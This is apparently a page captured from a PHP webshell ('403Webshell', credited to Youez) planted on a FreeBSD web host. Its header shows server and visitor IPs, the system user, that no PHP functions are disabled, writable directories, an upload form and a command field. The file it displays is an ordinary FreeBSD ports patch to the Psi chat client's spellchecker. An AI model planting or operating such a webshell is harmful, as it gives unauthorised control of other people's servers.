403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.217.33
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/net-im/psi/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/net-im/psi/files/patch-src_libpsi_tools_spellchecker_spellchecker.cpp
--- src/libpsi/tools/spellchecker/spellchecker.cpp.orig	2018-11-02 00:37:04 UTC
+++ src/libpsi/tools/spellchecker/spellchecker.cpp
@@ -48,7 +48,7 @@ SpellChecker* SpellChecker::instance()
 #elif defined(HAVE_ASPELL)
 		instance_ = new ASpellChecker();
 #elif defined(HAVE_HUNSPELL)
-		instance_ = new HunspellChecker();
+		instance_ = new HunSpellChecker();
 #else
 		instance_ = new SpellChecker();
 #endif
@@ -80,14 +80,23 @@ bool SpellChecker::isCorrect(const QString&)
 	return true;
 }
 
-QList<QString> SpellChecker::suggestions(const QString&)
+QList<QString> SpellChecker::suggestions(const QString&, const QString&, unsigned)
 {
 	return QList<QString>();
 }
 
-bool SpellChecker::add(const QString&)
+bool SpellChecker::add(const QString&, const QString&)
 {
 	return false;
+}
+
+QList<QString> SpellChecker::getAllLanguages() const
+{
+	return QList<QString>();
+}
+
+void SpellChecker::setActiveLanguages(const QList<QString>&)
+{
 }
 
 SpellChecker* SpellChecker::instance_ = NULL;

Youez - 2016 - github.com/yon3zu
LinuXploit